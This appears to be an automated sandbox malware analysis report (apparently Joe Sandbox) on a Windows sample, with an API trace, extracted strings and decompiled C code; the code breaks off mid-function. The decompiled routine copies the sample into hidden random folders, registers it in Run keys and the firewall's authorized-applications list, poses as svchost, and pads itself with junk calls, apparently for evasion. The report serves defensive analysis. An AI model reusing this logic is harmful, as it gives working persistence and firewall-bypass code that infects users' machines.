DeleteFileA.KERNEL32(4tt4t4wwt44t4tw4tw4wt4tw4t), ref: 008B30AC
Sleep.KERNEL32(000007D0), ref: 008B30B7
InternetCloseHandle.WININET(00000000), ref: 008B30C4
FindWindowA.USER32 ref: 008B30F3
Sleep.KERNEL32(000007D0), ref: 008B310D
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B3118
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B3128
Sleep.KERNEL32(00001388), ref: 008B3133
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B313E
Sleep.KERNEL32(00001388), ref: 008B3149
PathFileExistsA.SHLWAPI(2uu5uii55i5i25i52i5ii2525i5i25i), ref: 008B3168
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B3177
Sleep.KERNEL32(00000FA0), ref: 008B3182
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B318D
Sleep.KERNEL32(000001F4), ref: 008B3198
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 008B31A8
FindWindowA.USER32 ref: 008B31B5
Sleep.KERNEL32(00001388), ref: 008B31D3
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B31DE
SetForegroundWindow.USER32(00000000), ref: 008B31EB
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 008B31FB
ShowWindow.USER32(00000000,00000001), ref: 008B320A
Sleep.KERNEL32(000001F4), ref: 008B3215
ShowWindow.USER32(00000000,00000001), ref: 008B3224
Sleep.KERNEL32(00003A98), ref: 008B322F
MoveFileA.KERNEL32 ref: 008B323F
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B324A
ShowWindow.USER32(00000000,00000000), ref: 008B3259
Sleep.KERNEL32(000001F4), ref: 008B3264
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B326F
Sleep.KERNEL32(00001388), ref: 008B32A1
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B32B1
PathFileExistsW.KERNELBASE(3r37grg73g7e37geg73g7eg73g7e), ref: 008B32BE
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B32FD
Sleep.KERNEL32(00001388), ref: 008B330A
FindWindowA.USER32 ref: 008B3317
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B3331
SetForegroundWindow.USER32(00000000), ref: 008B333E
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B334E
CopyFileA.KERNEL32(3r38r38r838r838r388r838r83,4tt4t4wwt44t4tw4tw4wt4tw4t,00000000), ref: 008B3360
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B336B
SetFocus.USER32(00000000), ref: 008B3378
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B3383
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B338E
Sleep.KERNEL32(00000BB8), ref: 008B3399
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B33CB
Sleep.KERNEL32(00001388), ref: 008B33D6
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B33E6
Sleep.KERNELBASE(000001F4), ref: 008B3407
ExitProcess.KERNEL32 ref: 008B3429
CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 008B37FF
GetLastError.KERNEL32 ref: 008B380B
ExitProcess.KERNEL32 ref: 008B381A
PathFileExistsW.KERNELBASE(3r37grg73g7e37geg73g7eg73g7e), ref: 008B38A1
MoveFileA.KERNEL32 ref: 008B38B9
MoveFileA.KERNEL32 ref: 008B38F0
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B38FB
Sleep.KERNEL32(000007D0), ref: 008B3908
FindWindowA.USER32 ref: 008B3915
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B3934
CopyFileA.KERNEL32(3r38r38r838r838r388r838r83,4tt4t4wwt44t4tw4tw4wt4tw4t,00000000), ref: 008B3946
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 008B3956
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B3961
Sleep.KERNEL32(00002710), ref: 008B396C
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B39A3
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 008B39B3
FindWindowA.USER32 ref: 008B39C2
MoveFileA.KERNEL32 ref: 008B39E5
Sleep.KERNEL32(00001F40), ref: 008B39F0
DeleteFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B39FB
MoveFileA.KERNEL32 ref: 008B3A0B
Sleep.KERNEL32(000007D0), ref: 008B3A16
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 008B3A29

Strings

X, xrefs: 008B472F
", xrefs: 008B416B
(#, xrefs: 008B3E25
%ls:Zone.Identifier, xrefs: 008B3ED5
wgg4gwg4wgw4w4gw4gw4g4wghw4h, xrefs: 008B2B20, 008B2B8C, 008B2CAC, 008B2D59, 008B2F51, 008B3091, 008B323A, 008B38B4, 008B38EB, 008B39E0, 008B3ACC, 008B3B1A, 008B3B61, 008B3C50, 008B3C5B, 008B3CCD, 008B3D72, 008B3DE3, 008B3E36, 008B3E46, 008B4114, 008B41C4, 008B4292, 008B4318, 008B4328, 008B4363, 008B4486, 008B488B
w4rr4w4rw4rwr44rr4w4rr44r, xrefs: 008B2BA7, 008B2C14, 008B2CD8, 008B2D89, 008B2D9F, 008B2F41, 008B2F67, 008B3061, 008B3139, 008B3188, 008B31A3, 008B31D9, 008B31F6, 008B32A7, 008B32F3, 008B3344, 008B33DC, 008B392A, 008B3951, 008B3999, 008B39AE, 008B3A7D, 008B3C6B, 008B3F91, 008B4026, 008B4146, 008B421A, 008B44DB, 008B44E0, 008B452D, 008B4560, 008B45FE, 008B46AF, 008B46C5, 008B4702, 008B4780, 008B4828, 008B483E, 008B493D, 008B49E7, 008B4A33, 008B4A4E, 008B4A8F, 008B4AAC, 008B4AC6, 008B4ADB, 008B4B3B, 008B4B51, 008B4B61, 008B4BB3, 008B4C1C, 008B4C2C, 008B4C81, 008B4C8C
n#, xrefs: 008B4468
3r38r38r838r838r388r838r83, xrefs: 008B2AF2, 008B2B1B, 008B2B87, 008B2BF9, 008B2CA7, 008B2D54, 008B2D6F, 008B2E16, 008B2F31, 008B2F4C, 008B308C, 008B3172, 008B3245, 008B332C, 008B335B, 008B3366, 008B38AF, 008B38E6, 008B38F6, 008B3941, 008B395C, 008B39BD, 008B39DB, 008B3AC7, 008B3B0A, 008B3B15, 008B3B42, 008B3B5C, 008B3BCC, 008B3C4B, 008B3CC8, 008B3D4D, 008B3D6D, 008B3DC4, 008B3DDE, 008B3E31, 008B3E41, 008B3E61, 008B3F5D, 008B3F7B, 008B3FAB, 008B3FC6, 008B404C, 008B40AF, 008B410F, 008B41A1, 008B41BF, 008B428D, 008B4323, 008B4333, 008B43EF, 008B43FF, 008B44AF, 008B44BA, 008B44D0, 008B4548, 008B4695, 008B46DD, 008B4724, 008B4818, 008B4886, 008B49C1, 008B4A1D, 008B4A84, 008B4B46, 008B4B81, 008B4BC3, 008B4BF7
Z, xrefs: 008B3B91
3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m, xrefs: 008B2BA2, 008B2C74, 008B2CC2, 008B319E, 008B31F1, 008B394C, 008B39A9, 008B3D7D, 008B45B5, 008B45E8, 008B4A49, 008B4AA7, 008B4AD6, 008B4C27
%ls:*:Enabled:%ls, xrefs: 008B4DC7
2, xrefs: 008B3B9B
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36, xrefs: 008B2C63, 008B2EAE, 008B2FE9, 008B3A24, 008B3BF2, 008B3D05, 008B406C, 008B41D7, 008B42CA, 008B45A4, 008B47AB, 008B48D0
Host Process for Windows Services, xrefs: 008B349D
3r37g37e7g3ge3ge7g37ge737eg, xrefs: 008B31B0, 008B3AE9, 008B3FD3, 008B4230, 008B42AC, 008B4A5B
svchost., xrefs: 008B3F0E
tyu6uyur, xrefs: 008B342F
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 008B4ECC
http://www.yandex.ru/, xrefs: 008B2CEB, 008B2EFA, 008B300F, 008B3A5C, 008B3C1F, 008B3D27, 008B408E, 008B41F9, 008B42EC, 008B4611, 008B47EC, 008B48F6
,, xrefs: 008B2E2B
%ls\%d%d%d, xrefs: 008B4D36
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 008B4E6A
3r37grg73g7e37geg73g7eg73g7e, xrefs: 008B2B36, 008B2B51, 008B2BBD, 008B2BD3, 008B2BE3, 008B2C2A, 008B2C3A, 008B2C50, 008B2C8C, 008B2C9C, 008B2D3E, 008B2DC7, 008B2DD2, 008B2DF9, 008B2E57, 008B2E67, 008B2E7D, 008B2EDC, 008B2EE7, 008B2F1B, 008B2FBE, 008B3030, 008B304B, 008B3079, 008B309C, 008B3113, 008B3123, 008B326A, 008B32B9, 008B337E, 008B3389, 008B33C6, 008B389C, 008B3DEE, 008B4522, 008B457B, 008B4591, 008B45D2, 008B4664, 008B467F, 008B476A, 008B47D9, 008B4927, 008B49D1, 008B4B6E
%ls\%ls, xrefs: 008B4D59
2uu5uii55i5i25i52i5ii2525i5i25i, xrefs: 008B2E95, 008B3163, 008B3235, 008B3A01, 008B3AB8, 008B3AD7, 008B3BD9, 008B3F9C, 008B3FB6, 008B3FED, 008B41AE, 008B43AC, 008B4792, 008B4A0E
svchost.exe, xrefs: 008B3452
<, xrefs: 008B4175
4tt4t4wwt44t4tw4tw4wt4tw4t, xrefs: 008B2E11, 008B2E88, 008B30A7, 008B30EE, 008B3312, 008B3356, 008B3910, 008B393C, 008B3A06, 008B3A35, 008B3A49, 008B3ADC, 008B3B05, 008B3B3D, 008B3BC7, 008B3CBD, 008B3D48, 008B3E5C, 008B3FBB, 008B3FF2, 008B4047, 008B40C5, 008B4392, 008B43FA, 008B471F, 008B48B2, 008B4960, 008B49A7, 008B4BDD
B, xrefs: 008B4739
nw55n5nww5n5nww5nw5n5n5n5n, xrefs: 008B2B4C, 008B2BDE, 008B2C35, 008B2C97, 008B2DC2, 008B2E62, 008B2ED7, 008B2F3C, 008B3046, 008B311E, 008B32AC, 008B32F8, 008B3349, 008B33E1, 008B392F, 008B399E, 008B39F6, 008B3C66, 008B3CE7, 008B402B, 008B451D, 008B4532, 008B4576, 008B45CD, 008B467A, 008B4707, 008B4765, 008B4785, 008B47D4, 008B4823, 008B4922, 008B49CC, 008B4ACB, 008B4B56, 008B4BB8, 008B4C91
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 008B4E08
%s%s, xrefs: 008B54E0

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: File$Sleep$Delete$Move$Window$Internet$CloseFindOpen$Handle$Show$Foreground$ExistsPath$CopyExitProcess$CreateErrorFocusLastMutex
String ID: "$%ls:*:Enabled:%ls$%ls:Zone.Identifier$%ls\%d%d%d$%ls\%ls$%s%s$(#$,$2$2uu5uii55i5i25i52i5ii2525i5i25i$3r37g37e7g3ge3ge7g37ge737eg$3r37grg73g7e37geg73g7eg73g7e$3r38r38r838r838r388r838r83$3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m$4tt4t4wwt44t4tw4tw4wt4tw4t$<$B$Host Process for Windows Services$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$Software\Microsoft\Windows\CurrentVersion\Run\$X$Z$http://www.yandex.ru/$n#$nw55n5nww5n5nww5nw5n5n5n5n$svchost.$svchost.exe$tyu6uyur$w4rr4w4rw4rwr44rr4w4rr44r$wgg4gwg4wgw4w4gw4gw4g4wghw4h
API String ID: 301308742-3935118898
Opcode ID: e83b91f0e289df69639b8e95d3d6a33d7390fa24c67497e2b5bc8907d1b42230
Instruction ID: bf3687a90673615836279ab47ea63a0fa6406343d24981dd99dd5ea49b664dbe
Opcode Fuzzy Hash: e83b91f0e289df69639b8e95d3d6a33d7390fa24c67497e2b5bc8907d1b42230
Instruction Fuzzy Hash: B5233A71A40B24EBDB20ABA5DC4ABD97774FB48701F004284F75AE63D0EBB85A95CF11

Uniqueness

Uniqueness Score: -1.00%

Function 008B4437, Relevance: 33.3, APIs: 13, Strings: 6, Instructions: 51
filesleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E008B4437() {
				char* _t253;
				char* _t256;
				char* _t258;
				signed int _t262;
				signed char _t267;
				char* _t325;
				char* _t328;
				char* _t343;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				int _t360;
				int _t362;
				long _t368;
				long _t369;
				long _t370;
				signed char _t372;
				int _t374;
				int _t378;
				int _t383;
				struct HWND__* _t388;
				int _t389;
				void* _t619;
				void* _t620;
				void* _t621;
				void* _t622;
				void* _t623;
				void* _t638;
				void* _t643;

				L0:
				while(1) {
					L0:
					 *(_t619 - 0x10f8) =  *(_t619 - 0x10f8) + 1;
					if( *(_t619 - 0x10f8) >= 3) {
						break;
					}
					L2:
					Sleep(0x1f4); // executed
					 *(_t619 - 0x510) = 0;
					 *((intOrPtr*)(_t619 - 0xa30)) = 0x236e;
					L3:
					while( *(_t619 - 0x510) <  *((intOrPtr*)(_t619 - 0xa30))) {
						_t388 = FindWindowA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", 0); // executed
						 *(_t619 - 0x10fc) = _t388;
						if( *(_t619 - 0x10fc) == 0) {
							L40:
							_t389 = PathFileExistsW(L"3r37grg73g7e37geg73g7eg73g7e"); // executed
							if(_t389 == 0) {
								L51:
								 *(_t619 - 0x510) =  *(_t619 - 0x510) + 1;
								continue;
							}
							L41:
							DeleteFileA("3r38r38r838r838r388r838r83");
							 *(_t619 - 0x1138) = 0;
							L43:
							while( *(_t619 - 0x1138) < 0x1770) {
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								DeleteFileA("3r38r38r838r838r388r838r83");
								 *(_t619 - 0x1138) =  *(_t619 - 0x1138) + 1;
							}
							Sleep(0x1388);
							 *((intOrPtr*)(_t619 - 0x1134)) = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
							if( *((intOrPtr*)(_t619 - 0x1134)) != 0) {
								DeleteFileA("3r38r38r838r838r388r838r83");
								SetForegroundWindow( *(_t619 - 0x10fc));
								SetFocus( *(_t619 - 0x10fc));
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								Sleep(0xc8);
								CloseWindow( *(_t619 - 0x10fc));
								Sleep(0xfa0);
							}
							 *(_t619 - 0x113c) = 0;
							L49:
							while( *(_t619 - 0x113c) < 0x9c4) {
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								 *(_t619 - 0x113c) =  *(_t619 - 0x113c) + 1;
							}
							goto L51;
						}
						L5:
						Sleep(0x7d0);
						DeleteFileA("3r38r38r838r838r388r838r83");
						DeleteFileA("3r38r38r838r838r388r838r83");
						Sleep(0x7d0);
						DeleteFileA("3r38r38r838r838r388r838r83");
						MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"w4rr4w4rw4rwr44rr4w4rr44r");
						 *(_t619 - 0x1120) = 0;
						L7:
						while( *(_t619 - 0x1120) < 0x190) {
							Sleep(0xfa0);
							MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							Sleep(0xfa0);
							DeleteFileA("3r38r38r838r838r388r838r83");
							 *(_t619 - 0x1120) =  *(_t619 - 0x1120) + 1;
						}
						Sleep(0x3e8);
						DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
						Sleep(0x1770);
						MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
						Sleep(0x1388);
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						 *(_t619 - 0x1114) = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
						DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
						if( *(_t619 - 0x1114) == 0) {
							L16:
							Sleep(0x7d0);
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							InternetCloseHandle( *(_t619 - 0x1114));
							DeleteFileA("3r38r38r838r838r388r838r83");
							SetForegroundWindow( *(_t619 - 0x10fc));
							SetFocus( *(_t619 - 0x10fc));
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							CloseWindow( *(_t619 - 0x10fc));
							MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
							 *((intOrPtr*)(_t619 - 0x111c)) = 0x58;
							 *((intOrPtr*)(_t619 - 0x110c)) = 0x42;
							 *((intOrPtr*)(_t619 - 0x1118)) =  *((intOrPtr*)(_t619 - 0x111c)) +  *((intOrPtr*)(_t619 - 0x110c));
							if( *((intOrPtr*)(_t619 - 0x1118)) < 0x1f4) {
								MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
								Sleep(0x1388);
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								 *(_t619 - 0x1128) = FindWindowA("2uu5uii55i5i25i52i5ii2525i5i25i", 0);
								 *(_t619 - 0x1114) = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
								if( *(_t619 - 0x1114) != 0) {
									Sleep(0x1388);
									MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
									 *(_t619 - 0x1108) = InternetOpenUrlA( *(_t619 - 0x1114), "http://www.yandex.ru/", 0, 0, 0, 0);
									if( *(_t619 - 0x1108) != 0) {
										Sleep(0x1388);
										DeleteFileA("3r38r38r838r838r388r838r83");
										MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"nw55n5nww5n5nww5nw5n5n5n5n");
										Sleep(0xfa0);
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
									}
									InternetCloseHandle( *(_t619 - 0x1108));
									Sleep(0xdac);
								}
								InternetCloseHandle( *(_t619 - 0x1114));
								Sleep(0x1388);
								if( *(_t619 - 0x1128) != 0) {
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									ShowWindow( *(_t619 - 0x1128), 0);
									SetForegroundWindow( *(_t619 - 0x1128));
									DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
									Sleep(0xfa0);
									 *(_t619 - 0x1114) = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
									if( *(_t619 - 0x1114) != 0) {
										 *(_t619 - 0x1108) = InternetOpenUrlA( *(_t619 - 0x1114), "http://www.yandex.ru/", 0, 0, 0, 0);
										if( *(_t619 - 0x1108) != 0) {
											Sleep(0x1388);
											MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
											Sleep(0x1388);
											DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										}
										InternetCloseHandle( *(_t619 - 0x1108));
										Sleep(0x1388);
										DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
										Sleep(0x3e8);
									}
									InternetCloseHandle( *(_t619 - 0x1114));
								}
							}
							 *((intOrPtr*)(_t619 - 0x1110)) = 0x12fd1;
							 *((intOrPtr*)(_t619 - 0x1100)) = 0x3e7;
							L28:
							while( *((intOrPtr*)(_t619 - 0x1110)) >  *((intOrPtr*)(_t619 - 0x1100))) {
								 *((intOrPtr*)(_t619 - 0x112c)) = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
								if( *((intOrPtr*)(_t619 - 0x112c)) != 0) {
									DeleteFileA("3r38r38r838r838r388r838r83");
									MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
									Sleep(0x1388);
									DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
									Sleep(0x1388);
									 *((intOrPtr*)(_t619 - 0x1100)) =  *((intOrPtr*)(_t619 - 0x1100)) + 1;
								}
							}
							if(PathFileExistsA("2uu5uii55i5i25i52i5ii2525i5i25i") != 0) {
								DeleteFileA("3r38r38r838r838r388r838r83");
								Sleep(0x1388);
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								Sleep(0x1f4);
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
							}
							 *((intOrPtr*)(_t619 - 0x1104)) = FindWindowA("3r37g37e7g3ge3ge7g37ge737eg", 0);
							if( *((intOrPtr*)(_t619 - 0x1104)) != 0) {
								Sleep(0x1388);
								DeleteFileA("3r38r38r838r838r388r838r83");
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								SetForegroundWindow( *(_t619 - 0x10fc));
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								ShowWindow( *(_t619 - 0x10fc), 1);
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								Sleep(0xc8);
								CloseWindow( *(_t619 - 0x10fc));
								Sleep(0x1f4);
							}
							 *(_t619 - 0x1130) = 0;
							L38:
							while( *(_t619 - 0x1130) < 0x190) {
								Sleep(0x1388);
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								DeleteFileA("3r38r38r838r838r388r838r83");
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								 *(_t619 - 0x1130) =  *(_t619 - 0x1130) + 1;
							}
							goto L40;
						}
						L10:
						MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
						Sleep(0x1388);
						DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
						Sleep(0x1770);
						DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
						 *(_t619 - 0x1108) = InternetOpenUrlA( *(_t619 - 0x1114), "http://www.yandex.ru/", 0, 0, 0, 0);
						Sleep(0x7d0);
						if( *(_t619 - 0x1108) == 0) {
							L15:
							InternetCloseHandle( *(_t619 - 0x1108));
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							goto L16;
						}
						L11:
						 *(_t619 - 0x1124) = 0;
						L13:
						while( *(_t619 - 0x1124) < 0x190) {
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							Sleep(0x7d0);
							MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
							Sleep(0xfa0);
							DeleteFileA("3r38r38r838r838r388r838r83");
							 *(_t619 - 0x1124) =  *(_t619 - 0x1124) + 1;
						}
						goto L15;
					}
					Sleep(0x1f4); // executed
					memset(_t619 - 0x418, 0, 0x208);
					ExpandEnvironmentStringsW( *(_t619 +  *(_t619 - 0x10f8) * 4 - 0x1044), _t619 - 0x418, 0x208);
					_t350 = rand();
					asm("cdq");
					_t352 = rand();
					asm("cdq");
					_t354 = rand();
					asm("cdq");
					wsprintfW(_t619 - 0xc38, L"%ls\\%d%d%d", _t619 - 0x418, _t354 % 0x7530 + 0x3e8, _t352 % 0x7530 + 0x3e8, _t350 % 0x7530 + 0x3e8);
					wsprintfW(_t619 - 0xf68, L"%ls\\%ls", _t619 - 0xc38, _t619 - 0xa2c);
					_t620 = _t620 + 0x34;
					_t360 = CreateDirectoryW(_t619 - 0xc38, 0); // executed
					if(_t360 == 0) {
						L62:
						continue;
					}
					L53:
					Sleep(0x3e8); // executed
					_t362 = CopyFileW(_t619 - 0x758, _t619 - 0xf68, 0); // executed
					if(_t362 == 0) {
						goto L62;
					}
					L54:
					Sleep(0x3e8); // executed
					wsprintfW(_t619 - 0x9c8, L"%ls:*:Enabled:%ls", _t619 - 0xf68, _t619 - 0x500);
					_t643 = _t620 + 0x10;
					SetFileAttributesW(_t619 - 0xc38, 7); // executed
					SetFileAttributesW(_t619 - 0xf68, 7); // executed
					_t368 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0xf003f, _t619 - 0x75c); // executed
					if(_t368 == 0) {
						_t383 = wcslen(_t619 - 0x9c8);
						_t643 = _t643 + 4;
						_t118 = _t383 + 2; // 0x2
						RegSetValueExW( *(_t619 - 0x75c), _t619 - 0xf68, 0, 1, _t619 - 0x9c8, _t383 + _t118);
						RegCloseKey( *(_t619 - 0x75c));
					}
					_t369 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0xf003f, _t619 - 0x75c); // executed
					if(_t369 == 0) {
						_t378 = wcslen(_t619 - 0xf68);
						_t643 = _t643 + 4;
						RegSetValueExW( *(_t619 - 0x75c), _t619 - 0x500, 0, 1, _t619 - 0xf68, _t378 + _t378 + 2); // executed
						RegCloseKey( *(_t619 - 0x75c));
					}
					_t370 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0xf003f, _t619 - 0x75c); // executed
					if(_t370 == 0) {
						_t374 = wcslen(_t619 - 0xf68);
						_t643 = _t643 + 4;
						_t134 = _t374 + 2; // 0x2
						RegSetValueExW( *(_t619 - 0x75c), _t619 - 0x500, 0, 1, _t619 - 0xf68, _t374 + _t134); // executed
						RegCloseKey( *(_t619 - 0x75c));
					}
					_t372 = E008B2730(_t619 - 0xf68); // executed
					_t620 = _t643 + 4;
					if((_t372 & 0x000000ff) != 1) {
						goto L62;
					} else {
						L61:
						ExitProcess(0); // executed
					}
				}
				L63:
				Sleep(0x1f4);
				_t253 = E008B27E0(_t619 - 0x7a0);
				_t621 = _t620 + 4;
				if(RegOpenKeyExA(0x80000002, _t253, 0, 0xf003f, _t619 - 0x75c) != 0) {
					L69:
					Sleep(0x1f4);
					_t256 = E008B27E0(_t619 - 0x488);
					_t622 = _t621 + 4;
					if(RegOpenKeyExA(0x80000002, _t256, 0, 0xf003f, _t619 - 0x75c) == 0) {
						E008B27E0(_t619 - 0x1038);
						E008B27E0(_t619 - 0x770);
						E008B27E0(_t619 - 0x1020);
						E008B27E0(_t619 - 0x49c);
